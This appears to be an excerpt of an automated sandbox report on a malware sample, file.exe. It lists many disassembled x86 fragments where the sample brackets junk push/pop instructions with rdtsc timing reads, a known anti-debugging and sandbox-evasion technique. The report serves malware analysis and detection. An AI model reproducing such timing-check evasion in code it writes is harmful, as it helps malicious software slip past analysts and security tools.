                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AC381 second address: 2AC38A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AC38A second address: 2AC390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AD0B9 second address: 2AD0C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AD3AD second address: 2AD3B7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F05ECFAD306h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0E65 second address: 2B0E74 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0E74 second address: 2B0E88 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F05ECFAD306h 0x00000008 jp 00007F05ECFAD306h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0E88 second address: 2B0E90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0E90 second address: 2B0EAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD30Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F05ECFAD30Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B101B second address: 2B103B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F05ECE231B6h 0x0000000b jng 00007F05ECE231B6h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F05ECE231BAh 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B103B second address: 2B1047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F05ECFAD306h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B135C second address: 2B1364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BF4B0 second address: 2BF4F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F05ECFAD313h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pushad 0x00000012 jmp 00007F05ECFAD30Dh 0x00000017 push esi 0x00000018 pop esi 0x00000019 jmp 00007F05ECFAD30Fh 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 popad 0x00000021 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BF4F1 second address: 2BF4F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BD738 second address: 2BD73C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BD73C second address: 2BD740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BD740 second address: 2BD746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BDF30 second address: 2BDF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BEBB9 second address: 2BEBD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F05ECFAD306h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007F05ECFAD30Eh 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BEBD9 second address: 2BEBFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F05ECE231C3h 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007F05ECE231B6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BEBFE second address: 2BEC02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BF359 second address: 2BF377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05ECE231C8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BF377 second address: 2BF37D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BD279 second address: 2BD292 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F05ECE231BDh 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C2690 second address: 2C26A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jmp 00007F05ECFAD30Ah 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C616A second address: 2C6170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C6170 second address: 2C6174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D611E second address: 2D6129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D6129 second address: 2D613E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F05ECFAD306h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnp 00007F05ECFAD306h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D613E second address: 2D6186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05ECE231BBh 0x00000009 jmp 00007F05ECE231C0h 0x0000000e popad 0x0000000f jmp 00007F05ECE231C9h 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 push eax 0x00000018 pop eax 0x00000019 jg 00007F05ECE231B6h 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D5B43 second address: 2D5B80 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F05ECFAD306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F05ECFAD315h 0x00000010 jmp 00007F05ECFAD30Fh 0x00000015 jmp 00007F05ECFAD318h 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D7E37 second address: 2D7E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DCAE2 second address: 2DCAF1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007F05ECFAD306h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DFAFB second address: 2DFB01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E6655 second address: 2E665A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2ED352 second address: 2ED379 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231BAh 0x00000007 pushad 0x00000008 jmp 00007F05ECE231C8h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2ED91B second address: 2ED945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05ECFAD313h 0x00000009 jmp 00007F05ECFAD312h 0x0000000e popad 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2ED945 second address: 2ED95A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F05ECE231BFh 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EDC6D second address: 2EDC77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F05ECFAD306h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EDE20 second address: 2EDE25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EDE25 second address: 2EDE39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnp 00007F05ECFAD306h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EDE39 second address: 2EDE43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F05ECE231B6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F2569 second address: 2F2571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F2571 second address: 2F258B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F05ECE231B6h 0x0000000a jmp 00007F05ECE231BEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F258B second address: 2F2596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F21A6 second address: 2F21B9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F05ECE231BAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F21B9 second address: 2F21C8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F05ECFAD306h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 301084 second address: 301098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F05ECE231B6h 0x0000000e jg 00007F05ECE231B6h 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 301098 second address: 3010B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD314h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3010B0 second address: 3010ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jmp 00007F05ECE231C7h 0x00000011 pop edx 0x00000012 pushad 0x00000013 jmp 00007F05ECE231BFh 0x00000018 jbe 00007F05ECE231B6h 0x0000001e push esi 0x0000001f pop esi 0x00000020 popad 0x00000021 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 304961 second address: 304966 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 304966 second address: 30496C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 315335 second address: 31533B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 314EE8 second address: 314EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 314EEE second address: 314EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F05ECFAD306h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 314EFD second address: 314F17 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F05ECE231B6h 0x00000008 jmp 00007F05ECE231C0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 314F17 second address: 314F1E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 314F1E second address: 314F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F05ECE231B6h 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 314F30 second address: 314F5D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F05ECFAD306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F05ECFAD318h 0x00000010 jmp 00007F05ECFAD312h 0x00000015 push esi 0x00000016 jp 00007F05ECFAD306h 0x0000001c pop esi 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 314F5D second address: 314F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32DE3C second address: 32DE40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32DE40 second address: 32DE46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32DE46 second address: 32DE4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32DE4C second address: 32DE50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32DE50 second address: 32DE80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD312h 0x00000007 jng 00007F05ECFAD306h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 jmp 00007F05ECFAD310h 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32DFEC second address: 32DFFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231BBh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32DFFD second address: 32E015 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 je 00007F05ECFAD306h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jbe 00007F05ECFAD314h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32E1B4 second address: 32E1B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32E2DB second address: 32E2DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32E2DF second address: 32E2E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32E8D4 second address: 32E8F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05ECFAD30Eh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F05ECFAD306h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32E8F1 second address: 32E90B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C0h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32E90B second address: 32E90F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32EAA7 second address: 32EAB1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F05ECE231C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32EC1D second address: 32EC29 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32ED7D second address: 32ED87 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F05ECE231CEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33190B second address: 33190F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33190F second address: 331915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 331915 second address: 33191B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33191B second address: 33191F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 331C7C second address: 331C9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F05ECFAD30Ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F05ECFAD308h 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 331C9E second address: 331CE4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jbe 00007F05ECE231B6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F05ECE231C7h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F05ECE231C9h 0x00000020 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 331CE4 second address: 331CEE instructions: 0x00000000 rdtsc 0x00000002 jns 00007F05ECFAD306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0142 second address: 49E0146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0146 second address: 49E014C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E014C second address: 49E0163 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECE231C3h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0163 second address: 49E0167 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0167 second address: 49E0176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0176 second address: 49E017C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E017C second address: 49E0181 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0181 second address: 49E01C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05ECFAD312h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], ebp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F05ECFAD30Eh 0x00000016 xor cx, 4A18h 0x0000001b jmp 00007F05ECFAD30Bh 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 mov cl, 56h 0x00000025 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E01C2 second address: 49E0203 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F05ECE231BBh 0x00000008 sbb cx, 3EDEh 0x0000000d jmp 00007F05ECE231C9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F05ECE231BDh 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0E5F second address: 49C0E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0E63 second address: 49C0E69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
